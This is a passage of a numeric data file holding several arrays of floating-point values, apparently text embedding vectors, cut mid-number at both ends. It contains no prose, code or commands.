87,-0.029721348,-0.018139884,0.050738763,-0.021352755,0.060501665,-0.038156133,-0.03732334,0.020916028,0.026971154,0.033654373,-0.04309695,-0.07586788,0.025688797,0.038213227,0.012610097,-0.016984781,0.038118634,0.03515954,-0.0062215985,-0.019152408,-0.035764042,0.034031067,0.010765328,-0.035756826,0.0013111877,0.06167933,0.04980854,-0.05844943,-0.0024850094,-0.023968918,0.013578399,0.0067647058,-0.014663597,0.04968273,-0.004452477,0.00788021,-0.0339623,0.053046204,0.028235067,0.0036041138,-0.0404673,-0.031593595,0.04799278,0.080690525,-0.014208577,0.017291086,-0.01696132,-0.009047115,-0.049326025,0.020678911,-0.007342911,-0.043387648,0.0020786808,-0.029713891,-0.006342454,0.0077263657,0.030150138,-0.01990054,-0.04983623,-0.0013967833,0.026704269,0.026979422,0.00027896074,0.013579391,-0.027877556,0.041785706,0.0287653,-0.011356993,0.0109549975,-0.047643792,0.036991782,0.05606309,-0.040727116,0.008620946,-0.015289843,-0.04341186,0.01949544,-0.059227396,-0.03617553,0.030706279,0.0050126933,-0.03996864,-0.013108597,-0.0072403117,-0.032414194,0.080745,0.0042458856,0.031309985,-0.008341441,0.014299072,-0.09914567,-0.023051482,0.035011135,0.05527933,0.043503247,-0.021747965,-0.03334305,0.01324485,0.030212922,-0.006649561,0.024091888,-0.014279405,0.030952364,0.054366995,0.07185442,0.03239047,-0.10628107,0.032576963,0.02828189,0.031372454,0.0137008,-0.026574254,-0.022317348,-0.009250718,0.0536992,0.023146864,0.021132007,0.062129073,0.004542322,-0.049120102,-0.00848709,-0.0060159275,0.07154071,0.07929037,-0.03138471,-0.033898298,0.04323411,-0.043990456,-0.0119862165,0.042354133,0.00416582,0.09754337,-0.028921597,-0.020239664,-0.018787647,-0.01535539,0.012114157,-0.0016685375,0.018105537,-0.040395156,0.026601994,0.019629175,-0.06506539,0.00060264376,-0.06383983,0.039225135,0.0856272,-0.071683966,0.0008101136,0.011509685,-0.058561757,0.06403053,0.011803591,-0.041249488,0.0053488193,-0.061177526,0.043211397,-0.035606105,-0.0540986,-0.02653064,-0.049264662,-0.026251582,0.008231412,0.04150602,0.023061622,-0.009748148,-0.013015027,0.0005122168,-0.008677647,0.021925356,0.006356503,-0.008571067,-0.08088282,0.0020041952,0.041822977,0.012245979,0.025152383,0.03385938,0.021916116,-0.0130009735,0.031659555,-0.005166322,-0.031588852,0.01572117,-0.0386535,-0.07787939,-0.06766361,-0.0010610513,0.01051758,-0.0005376299,0.0065705623,0.013573856,-0.060667604,0.028651793,0.049320042,-0.05651669,-0.0063542337,0.019323662,-0.026540197,-0.065265514,-0.023561578,-0.038111072,0.015728723,-0.011585592,-0.027866997,-0.0036230383,-0.012765503,0.010485133,-0.023107884,-0.063741304,0.023729917,0.02921158,-0.04242551,-0.013336001,0.04476844,0.017670155,0.022649148,0.04322991,0.027051166,0.052237313,-0.023284191,0.0056220856,-0.031149816,-0.0071467413,0.04550903,-0.015490254,-0.046387084,0.04411653,-0.047098894,-0.009532371,0.007283387,0.026124755,-0.017908186,0.003643848,-0.009764572,-0.04588113,-0.010117872,-0.025695294,0.011095235,0.028409757,0.03385891,-0.033843223,-0.020224746,-0.0019867683,-0.0072846366,0.0014827495,0.036868174,-0.01409831,-0.06107585,-0.0118249385,-0.0073293266,-0.015563514,0.029410541,0.04057295,0.001974529,-0.058363583,-0.029510837,0.05121423,-0.053793095,0.008390569,0.012804551,0.0063902596,0.0061045997,-0.02229919,-0.056351423,0.018050794,-0.05399037,-0.0189595,-0.015901167,0.037218332,0.03203735,-0.0010741601,0.035226442,-0.0019512598,-0.00355374,-0.035758436,-0.059816808,0.00640292,0.00917547,0.07489736,-0.032742646,0.0020992004,0.021569535,-0.024005832,0.0076215942,-0.03067128,-0.0014498015,0.013476805,-0.03206089,-0.040687528,-0.0041114492,-0.021877235,-0.09298883,0.041339807,0.009511766,-0.014129629,-0.02360702,-0.035370614,-0.0484543,0.020800686,-0.09549311,0.06436285,-0.03913618,-0.020245671,-0.026906192,0.014361214,0.008311903,-0.029201668,0.00001612006,-0.05718859,-0.025289346,-0.0499774,0.025982078,-0.046588268,0.044071577,0.013621564,0.048731,0.03742996,0.0076426053,0.009680766,-0.022138387,0.0191555,-0.019388951,0.04080764,0.06498408,0.023072114,-0.014268898,0.07187658,0.058765862,0.012330029,0.009587542,0.027826285,0.011136732,-0.009389474,-0.029018482,-0.057838835,-0.061963037,0.0069587887,0.0068449704,-0.015622527,-0.052248944,0.0419667,0.012206396,-0.07008472,-0.0023293092,-0.046948068,-0.060088176,0.023717504,0.03487385,-0.0015618316,-0.0464883,0.056158926,0.011873298,0.076529466,-0.00061764877,0.0103274975,-0.056040417,0.02769128,0.0037383544,0.04255531,0.013598668,0.022775616,-0.038945,-0.011636431,-0.03335984,-0.07160755,-0.013830806,0.014344611,-0.043375548,0.0074237944,-0.017171944,-0.010668136,0.030709183,-0.01316868,-0.004068439,-0.06882845,0.054578062,-0.0054891882,0.038346235,-0.016625041,0.025280872,-0.0021983183,-0.029201772,0.020889856,0.008255823,0.009698287,-0.045331117,-0.03613695,0.040175002,-0.009880779,0.09114441,-0.003158378,0.047375254,0.023188181,-0.011132601,-0.021574467,0.023222864,0.039416634,-0.009753264,-0.02328775,-0.009891572,0.009505391,-0.015234915,0.052480806,-0.0068728286,0.049720883,-0.02564456,-0.02866182,0.010508095,-0.0220042,0.073023625,-0.059902888,0.05479914,-0.0669997,-0.01693521,-0.07528294,-0.028003957,0.035745375,0.053483702,-0.014828232,-0.01578565,-0.0067512724,-0.017282574,-0.06153559,0.05120737,0.021479994,-0.037095133,0.039647494,-0.023832781,-0.011244982,0.049478907,-0.014148745,-0.00074313465,0.011062842,-0.0036309294,0.05949354,0.016089518,0.058353443,-0.035822667,-0.033780046,-0.020639861,-0.01342158,-0.024436334,-0.0030671812,-0.037269503],[0.07680926,0.008443998,-0.18974896,-0.05570265,0.07737385,-0.06286657,0.0067578414,0.010388794,-0.015146931,-0.04604895,-0.019507922,0.022534998,0.009457465,-0.028984467,-0.086842366,-0.020409783,-0.0070362035,-0.007146662,-0.042776126,0.02998994,-0.017210277,-0.045145884,-0.070185475,-0.0029266817,0.08845711,0.0403111,-0.045464993,-0.009922629,0.020156112,0.04682095,0.06780717,0.014502657,-0.045594078,-0.03468422,-0.05128923,-0.088243,0.042651452,-0.0107300375,0.01820355,0.018125735,-0.01699509,-0.032345705,0.02513168,0.006256787,-0.0048482404,0.06300903,0.015189051,0.0059181717,0.04370821,-0.059856094,0.05031884,-0.02123581,0.021892365,-0.003631309,0.03660989,-0.012649302,0.011331884,-0.004013133,0.014517013,-0.02400813,0.035047837,-0.008101607,-0.038263977,0.048029236,0.03206603,0.008584895,-0.04078163,0.031493213,0.002564254,-0.055334438,0.051063154,0.015655614,0.003651908,-0.062741265,-0.0057837605,0.021073088,-0.036087424,-0.062114548,0.019442337,0.014032399,0.03263472,-0.000986629,0.08543614,0.0115349125,0.02927043,-0.00560246,0.0041639027,0.026495779,-0.021267533,0.013580598,-0.039919626,-0.025927639,0.028881771,0.043003,-0.06899177,0.0399536,0.014398091,0.066124745,-0.04225134,-0.035074808,-0.020252498,-0.039122634,0.040498935,0.021586072,0.03987659,0.06270392,-0.010751038,0.03735911,0.02535126,0.02486512,-0.036340144,0.04125585,0.020031093,0.020043615,0.045538478,-0.019987907,0.041156977,-0.003275616,-0.004344892,0.071381204,0.002536046,-0.046904463,0.025857853,0.013423816,0.024600528,-0.0011896798,-0.040601693,0.014677091,0.014910459,-0.02558239,0.018648608,-0.03513446,-0.051634807,0.018170815,0.062211003,0.060600653,-0.04988208,-0.024283879,-0.0328037,0.0070583094,-0.020156048,0.008823274,-0.0063762395,-0.021665566,-0.016137835,-0.046822153,0.01319623,-0.031146491,-0.062210903,0.011622626,-0.033879373,0.0085002985,-0.027943771,-0.033988222,0.016216613,-0.06354282,-0.04772607,0.018703658,0.0032261119,0.057741467,0.004128239,0.016716275,-0.055433672,0.044118322,0.0064983447,-0.0706753,0.0469187,0.06184838,0.019540098,-0.010313195,-0.056742255,-0.004465344,-0.028492888,-0.051375672,-0.017876267,-0.020310849,0.014856391,-0.044584557,0.0038586368,-0.022279924,0.031820964,-0.00840463,0.023724161,-0.022660617,0.009002748,0.016552335,0.024561225,-0.021987826,-0.0037873704,-0.008516452,0.028087685,0.030613499,0.0077977534,-0.005578094,-0.021628259,-0.040714543,0.014468436,-0.016247677,0.010520415,-0.02716215,-0.021566328,-0.04228044,-0.013596933,-0.006600334,-0.00551613,0.011976727,0.001826659,0.041609835,-0.011056824,0.07608951,0.03487396,-0.015836306,-0.002878428,-0.01293566,0.0036525296,-0.051630672,-0.008756286,-0.020467516,-0.027139561,-0.010020914,-0.004763687,-0.024422456,0.048467144,-0.016369391,0.007425593,0.008307094,0.008296419,-0.025407854,-0.015924253,-0.010226277,-0.041600514,-0.10232517,0.022629177,0.029608706,0.035448834,0.049089916,-0.029205633,0.039881427,-0.017030006,0.06679074,-0.00011084714,0.06792865,-0.016148387,0.005340235,-0.02215779,0.005938918,-0.017047986,-0.041458935,0.0034564908,0.044012334,-0.018708047,-0.013155231,0.05219098,0.011049616,0.05727253,-0.03848622,-0.013114753,-0.015020466,0.013187011,0.024397155,0.031101089,-0.010936001,-0.0012299631,-0.02096895,0.021524053,-0.07783133,-0.035009902,0.006994053,0.00531006,0.058207855,0.0010064492,-0.02153666,0.037961513,0.055275794,0.029161945,0.0386452,0.033407107,-0.014082077,-0.015381336,-0.02851605,-0.076075315,-0.027312586,-0.024640264,-0.011867149,0.010826656,0.02299889,0.03985347,-0.013538369,-0.017842926,0.0073606926,0.042408943,-0.0038912473,-0.019158566,0.0031178764,-0.010570246,-0.010506805,0.05148204,-0.019842638,0.04392374,-0.0048438585,0.061229277,0.041544605,0.04551581,0.019717187,-0.023621665,-0.023704821,0.01079004,0.016708134,0.0034596317,-0.030711481,-0.01527078,-0.028896904,-0.074779,0.037186496,-0.02971515,0.048799608,0.031094525,-0.0027157583,-0.003579561,-0.013861449,-0.036988735,-0.04553777,-0.00093317305,-0.052997343,-0.020893414,0.03201911,0.008881652,0.035480034,-0.014229181,0.0060519683,0.04605739,0.0316137,0.004984604,-0.005532979,-0.04833139,0.02681857,0.01269933,0.025574971,0.0020371394,0.006573462,0.030993497,0.00030951554,0.040076606,-0.047180973,-0.022812275,-0.016070558,-0.06329902,0.005647646,0.059343237,0.039586518,-0.021827748,-0.0069114417,-0.012620568,-0.045587413,-0.0060392017,-0.04792393,0.015219224,0.03408993,-0.022663932,-0.0016470187,0.029359106,0.0064099594,-0.0102764955,-0.006349827,0.008222596,0.024156112,0.02739243,0.027060367,-0.0011318207,-0.037627183,-0.054097805,-0.015538531,0.041370068,0.062367175,-0.035092693,-0.014013996,-0.053419698,0.0051734084,-0.046376772,0.05102831,0.020965517,-0.06018373,0.017150793,0.021937467,-0.018118493,-0.033521194,-0.013369224,-0.006336662,-0.023349142,0.023710143,0.00054941926,0.006871287,-0.07349353,0.04854028,-0.010183532,-0.04347226,0.0011143701,0.017428964,-0.022648143,0.045561552,-0.07574235,0.0073363436,0.003745332,-0.00324563,-0.015050974,0.02225693,-0.05704317,-0.047255613,0.059586104,0.007016203,0.044129375,0.028336251,0.030982189,-0.049590725,0.0133508,-0.0049307826,0.05660076,0.06095267,-0.010114124,0.00932177,0.041172884,0.018883716,-0.05100873,0.0032964894,-0.011652005,0.020998133,0.025721718,0.036358666,-0.022274354,-0.056709934,0.03919175,0.018822623,0.039098512,0.013253457,0.025868304,-0.03073501,0.037972093,0.06419183,-0.03772644,0.032639727,0.033038888,-0.036359202,-0.04387568,-0.035070047,-0.009411244,0.087417245,0.09012812,-0.056092896,0.0038037056,0.06342368,-0.0037222614,-0.00831637,0.01091339,0.030370997,0.09801986,0.02382532,-0.018534752,-0.018886637,-0.0026230298,0.027143016,0.017123811,0.07971798,-0.05314456,-0.004580342,-0.0022391703,-0.033408802,-0.010441138,-0.03823727,0.05534133,0.09065836,-0.07160352,-0.022748157,-0.010525024,-0.003119107,0.043207724,-0.0046332334,0.008358304,-0.023616988,-0.010272326,0.0520658,0.028416041,-0.00021345475,-0.023145674,-0.029298943,-0.03727112,0.049903724,0.0018982411,-0.040322855,0.005833633,-0.0046929955,0.016683,0.02967854,0.009188129,0.0050933897,-0.0024495153,-0.02664055,0.029030738,0.024029525,0.0049119135,-0.0049575767,0.06751963,0.013607,-0.023497492,-0.023026627,0.028296372,-0.016441545,0.07538833,-0.023801431,-0.031964283,-0.06331399,0.02607611,-0.000055391676,0.0054670325,0.009073247,0.040459007,-0.024222622,0.042012103,-0.0051382734,-0.0031735231,0.04832726,0.014873346,-0.00341496,-0.006573403,-0.021625578,-0.02295163,-0.024351787,0.0070306053,-0.057739004,0.02209672,-0.02019649,0.0042462926,-0.027243972,-0.021666253,0.014647924,-0.0042716907,0.00055015075,-0.0074669216,0.005753652,0.020954672,0.051834963,-0.0020744426,-0.007502437,-0.021593744,0.039745945,0.0017346707,-0.049643744,0.025579344,0.038814764,-0.005632699,-0.06991995,0.06677499,-0.07281955,0.028340934,-0.072007306,0.017003112,-0.043421086,-0.00061665877,-0.02906715,-0.05880528,-0.011587277,-0.058842,-0.0035848136,0.07896876,0.0022333444,0.008571321,-0.06576687,-0.008698647,0.04623423,-0.014461445,0.017330764,0.006362504,-0.02759709,-0.031014074,0.008635927,0.020659775,0.01163323,0.047696218,-0.0014560993,-0.030528896,-0.067785,0.051298153,-0.07082377,0.054605775,0.046360455,-0.0062348754,0.017901922,0.0014335532,-0.05584986,0.012203486,-0.037205976,-0.01998275,0.01402402,0.036385823,-0.034972988,0.0106757805,0.052668143,-0.027348934,-0.009643013,-0.048079308,-0.07244996,-0.01608252,0.04353722,0.02564853,-0.06658016,0.016410256,0.019529205,0.010486433,-0.016552951,-0.051951475,-0.049183544,0.049394406,0.015434167,-0.04494443,0.022954522,0.03927996,-0.039773177,0.016023124,0.005521506,0.015545197,-0.036753595,-0.035842385,-0.020991588,0.039595656,-0.04558851,0.043204486,-0.002373334,-0.02739462,-0.051453426,0.019720513,0.055212174,0.00018551109,-0.013941171,-0.035656683,-0.030949648,-0.06374801,0.041044354,0.030699914,-0.003722649,-0.03260954,0.05446,0.06849015,0.0142493155,-0.06197662,-0.017082427,0.015769219,-0.001955787,0.06415217,0.05738689,0.073983625,-0.0069112857,0.06480173,0.06472758,0.0388801,-0.01478768,-0.011613897,0.0056600887,0.012024395,-0.017419837,-0.022652762,-0.033876635,-0.0038793439,-0.015964633,-0.00085138,-0.031851538,0.049966898,0.008311478,-0.00021541516,-0.003874393,-0.017692514,-0.054433268,0.040480167,0.03723352,-0.018440824,-0.018588364,0.039022256,0.0030461645,0.07174362,0.024668049,-0.01568153,0.0069339047,0.015323677,-0.021860993,0.04495513,-0.061836082,-0.0065102903,-0.033098895,-0.029195322,-0.025423663,-0.049330737,0.024786603,-0.015404226,-0.01940113,0.037906732,-0.031882226,-0.040058497,0.044465967,0.019934466,-0.062313955,-0.018588202,0.081422865,-0.041786637,-0.0053174244,-0.005170824,0.04684817,-0.030364051,0.0020484512,0.0003027199,0.031625453,0.011823617,-0.0039917626,-0.017986044,-0.020828322,0.013801971,0.024669666,-0.028123531,0.007931615,-0.023513757,-0.076094486,0.027631098,0.031366114,0.07431019,0.024197882,-0.09170605,0.0046370993,-0.005023154,0.0022903606,0.05605867,-0.017861258,0.047673784,-0.030118374,-0.037742537,-0.022223897,-0.02416893,0.08241647,0.01088407,0.007554553,-0.010242048,-0.008223263,-0.07358434,-0.0060743587,-0.031681262,0.015597933,-0.03216591,-0.010399371,0.009456634,-0.010546575,-0.04949519,0.051634055,0.02665611,-0.07423133,0.04308737,-0.026732659,-0.016093973,0.055236723,0.006656666,0.024661647,0.063130625,0.033017177,0.08557378,0.015620415,0.030250518,-0.027515138,-0.027736591,0.052539058,0.024633188,-0.06398358,-0.016979074,-0.040795177],[0.0479948,0.0112253595,-0.13375558,-0.060832083,0.07091307,-0.08371658,-0.009988432,0.036654767,-0.042918652,-0.06865421,-0.025066588,0.050479665,0.07066375,-0.014353852,-0.03463431,-0.037233472,0.039205227,-0.038553294,0.014250144,0.007619466,-0.019699886,-0.045358054,-0.00015285141,-0.028086161,0.09600241,0.035680644,0.03158583,-0.002741759,0.0008765142,0.040392697,-0.021991642,-0.014775548,-0.042789277,-0.014682603,-0.054663774,-0.07787011,0.045052886,0.01047081,0.0068237125,0.008806987,0.004989614,0.036798693,0.06041052,-0.06586861,0.021760626,0.0036501375,0.045554467,-0.013050382,0.06315531,-0.07738135,-0.010447451,-0.025227046,-0.016845167,-0.070376806,0.100834824,0.052724894,0.0013955643,0.038140383,-0.03235811,0.013924748,0.0831602,0.045856528,-0.028074997,0.039289493,0.06303894,-0.00763299,-0.025044236,0.039102416,-0.0034584473,0.016383206,0.003665087,-0.031768043,-0.02062638,0.012875836,-0.006081562,-0.03910222,0.013628977,-0.020232933,-0.037536353,0.0458846,0.0133656,-0.02891517,0.04686764,0.011743884,-0.003916152,-0.02932158,-0.0078176465,0.0063542514,0.0070396834,0.02372886,0.021694614,-0.009850589,0.010544838,0.0099882595,-0.06634261,0.016726347,0.047684647,0.0032094866,-0.0482308,-0.047552023,-0.014234788,0.0077729393,0.0098546,-0.028912237,-0.024195902,0.054637562,0.038291056,0.018282872,0.020406682,-0.011470732,-0.01681573,0.08780865,0.019115543,-0.018604314,0.03364386,-0.03048656,0.028823016,-0.015013698,-0.040743668,0.02895366,-0.022580178,-0.027349899,-0.015655901,0.05205995,0.00904217,0.032713205,-0.07747103,0.03662441,0.008621982,-0.029813629,-0.0019009118,0.000667,-0.037520573,0.029457662,0.021154482,0.044908468,-0.030800426,-0.049399488,0.004244629,0.0072283256,0.023937501,0.030034503,-0.027794013,-0.03292556,-0.021337682,-0.058677994,-0.012701926,-0.04474234,-0.05523236,0.010101114,-0.01229979,0.030549632,-0.009900299,0.014033894,0.059944745,-0.034319796,-0.004356271,0.012755943,-0.002135599,0.04538125,0.021449503,0.01800412,-0.033936974,0.035496213,-0.01542103,-0.068478756,0.04863319,0.085629985,-0.021746432,0.056090344,-0.010853424,-0.02030865,-0.037441887,-0.02833833,0.00046755772,0.002512246,0.06765904,-0.05107207,0.022504006,-0.056342263,0.036466446,-0.049251158,0.062881514,-0.03495812,-0.040488437,0.018195298,0.040535238,-0.022496616,-0.0066413884,0.00040195466,0.02136211,0.0058461004,-0.04267416,-0.032969195,-0.038447402,-0.062387094,0.017685866,-0.01958795,0.011914995,-0.0059469645,-0.051836636,-0.011656918,-0.023598677,-0.019101331,-0.04371548,0.03757717,-0.012962186,0.042092647,-0.016459964,0.0040563582,0.06620124,0.014638138,0.028908575,0.02513004,-0.0037399707,-0.030122906,0.019670615,-0.01888397,-0.054031778,0.016092865,0.019038713,-0.013767616,0.0532726,0.04547052,0.03357458,0.010792702,-0.028093157,-0.009936758,-0.00019225474,-0.025793215,-0.04863247,-0.09472279,0.00013973948,0.038358133,0.009367944,0.021135382,-0.025103021,0.103774846,0.042852256,0.05090686,0.0026107223,-0.0055031246,-0.042837273,-0.010080086,-0.0249995,-0.0033671176,-0.014198868,-0.022094753,-0.0023693359,-0.0022383786,-0.017586773,-0.016329365,-0.01727309,0.0062099285,0.055236883,-0.048203066,0.020095745,0.0153390225,0.005943785,-0.061509475,-0.031917386,-0.030361388,0.02026641,-0.040171623,-0.016143214,-0.025151389,-0.058281995,0.015483392,0.026729831,0.034360074,0.035697114,0.052837458,0.04266689,0.057411715,-0.018945629,-0.0034413226,0.028812688,-0.046998896,-0.026552662,0.0007108679,-0.045066424,-0.011311169,-0.013173197,0.03287681,-0.03735556,-0.008445316,0.004065412,-0.022567345,0.017859502,0.010712587,0.041742187,-0.054084588,-0.019622773,0.01182894,-0.039977193,-0.008081584,0.021881666,-0.004595971,0.043335684,-0.017328534,0.055995848,0.03814071,0.028236216,0.058252856,-0.014160284,-0.034673113,0.009965993,0.04732239,-0.0025654286,-0.03517203,-0.024948234,-0.014464099,-0.037919153,0.06091387,-0.028260546,0.0057382616,0.04839804,-0.004350803,0.021202503,-0.03790065,-0.006975053,-0.054569803,0.024269497,-0.028747074,-0.023880336,0.054906074,-0.0152563285,0.03494605,-0.023127142,-0.038422152,0.016751355,0.018905642,0.045266554,-0.030952387,-0.014317671,0.04274204,0.021578033,0.003386935,-0.035300225,0.035282996,0.0057789967,-0.049740948,0.008292573,-0.0048155896,-0.00787826,0.011125085,-0.0192212,0.013630568,0.05194075,0.03652254,-0.057612777,0.021488428,0.0039169034,0.016514618,0.021258013,0.0019451849,0.012875376,0.006862736,0.017721513,-0.006092763,0.07631479,0.020872736,0.017716797,0.01419296,0.00004206546,0.02243175,0.034568533,0.018868132,-0.019081615,-0.01170585,-0.0053750817,0.0012042343,0.009873681,0.006290455,-0.02248972,-0.0152103,-0.07624356,0.013310647,-0.002049461,0.028076325,0.03637437,-0.06665486,0.007085554,0.05514602,-0.00019611519,-0.006881488,0.030603463,0.0052814563,0.035765156,0.034957003,-0.0013768468,-0.014458127,-0.035409946,0.011427021,-0.005144924,-0.03538198,0.006051731,-0.008767074,-0.037871026,0.024628568,-0.07257969,-0.058915745,0.031164007,0.035189673,-0.0019728567,-0.012350033,-0.020711789,-0.035404667,0.046433855,0.034371182,0.019989843,-0.01990587,0.004316031,-0.07693363,0.0043112664,0.011991599,0.06523351,0.02815475,-0.0050601247,-0.061701447,0.03971787,0.024876341,0.039657254,0.00897639,0.0027552475,0.018945556,0.025068622,0.06507895,0.018999653,-0.060437765,0.014234876,0.043312494,0.054147966,-0.030748012,-0.0131091075,-0.01508246,0.017302873,0.060903,-0.007883241,0.054347273,0.018264076,0.014715869,-0.06491366,-0.03614003,0.0042524463,0.10384108,0.10383811,-0.05182022,-0.04277942,0.044133317,-0.03374785,0.03929339,-0.022167962,-0.011866935,0.121224016,-0.0016574301,0.009276997,-0.0055237557,0.025405798,0.017195057,0.0009047872,0.018362781,-0.082953796,0.014655895,0.028219545,0.036703393,-0.027636137,-0.03194055,0.04376731,0.09781272,-0.06154125,-0.0063811666,0.0150565775,0.007398341,0.053497113,0.0032972393,-0.02332023,0.043714117,-0.019830676,0.038043205,-0.014101089,-0.03621181,-0.021492723,-0.06311875,-0.017816164,0.009239765,0.0013776167,0.0019030671,-0.043365482,0.0042256205,0.03203145,0.0003764699,0.026886782,0.030954469,0.015504979,-0.050120395,-0.029879259,-0.053698983,-0.0029906426,0.02957116,0.019872319,0.020579308,-0.035832588,0.024948027,0.006934929,-0.005026475,0.042747684,-0.073348925,-0.03392196,-0.03688062,0.01266007,-0.043241274,0.020275973,-0.01549398,0.07792608,-0.022495847,0.044534497,0.004160112,-0.06724288,0.00057605165,0.0482592,-0.046494544,-0.037150767,0.033437364,-0.011856301,0.012551418,-0.00014619205,-0.0465793,0.04901377,-0.024048334,0.034053918,0.0120847635,-0.052218992,0.0010482304,0.0025151125,-0.01819269,-0.044004247,0.0058185323,-0.0036949622,0.026618488,0.010014722,0.03147315,0.032611318,0.015892904,-0.022847801,-0.03205135,0.008787267,0.04728433,-0.017888626,-0.057904914,0.04877921,-0.0613845,0.0007545632,-0.029171733,0.024703998,-0.0011745336,0.027783716,0.040269315,-0.023106791,-0.026538435,-0.018547244,-0.0028057299,0.023744699,0.022645727,0.0058020665,-0.04590848,0.022657296,0.020455362,-0.026094867,0.04867702,-0.036144525,0.0046555195,-0.023424286,-0.030214911,-0.018673273,0.05669037,0.02863979,0.0048752697,-0.08693192,-0.04439296,0.018910954,-0.017638098,-0.008263377,-0.0023564827,-0.02164006,0.0011200953,-0.013128669,-0.061567016,0.057080925,-0.015059072,-0.04939543,0.02169807,0.015506682,-0.011971323,0.034864172,0.019935496,0.0054509947,0.0156731,-0.030803218,-0.09607224,0.02003716,-0.027680011,0.011257142,-0.05727255,-0.012343973,0.043816254,-0.011810312,0.0011222922,-0.04058759,-0.040784396,0.004251968,-0.000121979945,-0.009447553,-0.05975827,0.053235263,-0.040983457,0.04625868,0.0009121656,0.022806471,-0.042297024,-0.002645995,-0.040548246,0.03509918,-0.037608217,0.085320584,-0.0057149506,0.03112812,-0.04277518,-0.0006895752,0.028654372,-0.061168134,0.037839673,-0.023054836,-0.039903462,-0.09504717,0.018567573,-0.06574566,0.007830757,-0.011096057,0.038357243,0.08552648,0.015983654,-0.0068167006,0.02634242,0.009699753,-0.022161499,-0.0051327776,0.055727188,0.033748552,-0.016097814,0.061459348,0.06349298,0.011928169,0.010351314,0.04324903,-0.028964587,0.042099252,-0.048358165,-0.057672057,-0.025835909,-0.019183435,-0.018583314,-0.019151196,-0.030375315,0.06724649,-0.00872304,-0.018472187,0.02714375,-0.063392185,-0.04142702,-0.0019180146,0.03081593,0.011564136,-0.02905302,0.054251667,0.0093741305,0.051421605,0.022043327,-0.016485192,-0.036064234,0.0027580129,-0.018015418,0.05077594,-0.021141723,0.015633633,-0.02782686,-0.035909723,-0.033042558,-0.028120682,-0.04629971,-0.03541771,-0.018094404,0.011724395,-0.0216379,0.040974017,0.020843117,-0.026109096,-0.019064508,-0.056460835,0.09077296,0.009268592,0.018448686,0.010152032,0.023798453,-0.000604448,0.011890209,0.027211126,-0.007980659,-0.0039621172,-0.013981201,-0.029261362,0.01833988,-0.020725142,0.06318918,0.03603633,0.022697031,0.0061878017,0.026063899,0.0009675963,0.035867963,0.053300485,-0.033895154,-0.026895516,0.03575379,0.003194595,0.028287185,0.04574322,-0.011049579,0.030773653,-0.016628554,0.004737141,-0.017608626,-0.06918587,0.050345916,-0.012438274,0.004519718,-0.04429741,-0.04298383,-0.047512487,0.013870929,-0.008007153,-0.0046569128,-0.033466816,0.013093672,-0.0035744037,-0.010742588,-0.03614645,0.036210157,0.035640787,-0.046635494,0.07173042,-0.0014603422,-0.05501419,0.05420692,-0.016573321,-0.044251937,0.023839345,0.02182308,0.08440516,-0.016488917,0.04491021,-0.028677953,-0.03786064,0.022148818,-0.0154399285,-0.07613858,-0.0007800136,-0.024181265],[0.037196063,-0.0020292553,-0.15883988,-0.047147516,0.06784679,-0.09085445,-0.009550976,0.0012914403,0.026294596,-0.061769612,-0.023049572,0.053382408,0.025265275,0.0043787505,-0.008633965,-0.020811759,0.017789388,-0.012872759,-0.016333684,-0.01390172,0.030668123,-0.04307268,-0.026938038,-0.020404553,0.09983787,0.017144497,0.025260821,0.0041517266,0.0024823945,0.038149156,0.04823432,-0.012191333,-0.058978833,-0.034528814,-0.06809869,-0.10385426,0.0247392,-0.007826377,-0.050122596,0.017737528,0.010374445,0.00029284804,-0.026267087,-0.068202764,-0.0020477343,-0.008560033,0.04237853,0.016015222,0.021333685,-0.09037262,0.003356388,-0.043004937,0.061488878,-0.0065621296,0.0774917,-0.006477717,0.0069985227,0.005757306,-0.008890518,-0.029773535,0.0838519,0.004055191,-0.032974873,0.10012802,0.00606576,0.030661402,-0.0415365,0.037600685,0.06380814,-0.03991571,-0.007023897,-0.005375832,-0.0025799926,-0.0026403302,-0.013756083,-0.0062512513,-0.01299765,-0.04946147,-0.037267078,0.06305355,-0.0007190443,0.011475251,0.05829337,-0.009105995,0.05426881,-0.025827222,0.007914452,0.0006378254,-0.038259093,0.02442375,0.011749924,0.03993972,-0.019829113,0.04095003,-0.05185041,0.036695234,0.0008145441,0.039418377,-0.036743812,-0.034463476,-0.01983256,-0.0039045278,0.034696374,-0.014790653,0.034499876,0.03929274,0.024192376,-0.014577113,0.027431415,0.024172505,0.018529054,0.048391674,0.017368272,0.014965592,0.010028198,-0.050164197,0.054098967,0.0017575645,-0.007989804,0.068659425,-0.015467928,0.02526513,-0.02982794,0.06108998,0.011457899,0.00923512,-0.06168792,0.033460006,0.039001185,-0.08193733,0.010160968,0.014651751,-0.03997781,0.040837936,0.06717596,0.034276076,-0.031466167,-0.042871345,-0.03392822,-0.026779851,-0.009440278,0.020596527,0.033526886,-0.011825958,-0.02225015,-0.024093302,0.009825808,-0.014544139,-0.066589825,0.042320248,-0.029328618,0.018471552,-0.02063253,-0.005359205,0.016824396,-0.03446752,0.018449543,-0.0038024872,0.012519521,0.07758797,-0.01402842,0.003994401,-0.039033066,0.038311604,-0.033781197,-0.055017013,0.018779103,0.10774332,0.02026759,-0.0092906095,-0.041824214,-0.014649756,0.011577053,-0.0304132,0.003583719,0.052891336,0.027277345,-0.041959804,0.018263137,-0.013447283,0.031458315,-0.042542662,0.09210602,0.015554077,-0.047033418,0.0036744368,-0.00969911,-0.03552843,-0.0036827396,-0.06325511,0.027452758,-0.0022107405,-0.030700913,0.0041145342,-0.010342347,-0.043006267,0.0146653,-0.007233194,0.026432034,-0.00005575764,-0.054798864,-0.0034539986,-0.034453988,-0.040398937,-0.043566227,0.06267075,0.019873757,0.030546999,-0.011586287,0.052330397,0.050778244,-0.048942953,-0.03387434,-0.04437969,0.016717173,-0.015523266,0.031415988,-0.028674498,-0.027844287,0.00550559,0.0408215,-0.0023583206,0.03645704,-0.0060343766,0.03269539,0.036272414,-0.029998925,0.006083399,0.038478654,-0.016670283,-0.060071163,-0.082094066,0.013881495,0.049716003,-0.003033625,-0.00009784693,-0.010724728,0.09826118,-0.0017098973,0.034249816,0.019420456,0.03592979,-0.025121965,0.056749623,-0.016348612,0.017858945,-0.027487138,-0.038647644,-0.005198445,0.06264224,0.034304515,-0.004279388,0.027440218,0.009907466,0.05748439,-0.033053484,-0.026157673,0.0068054097,0.012663971,-0.01953082,-0.006518235,-0.017091839,0.0128725115,-0.05111746,0.019244522,-0.049700096,-0.05065726,0.02616461,0.0067932755,0.010436844,0.036205806,0.03963696,0.055532616,0.014407431,-0.005428624,-0.0064232675,0.06267637,-0.009049591,-0.046899825,-0.007683166,-0.07217529,0.024460409,-0.0128348805,-0.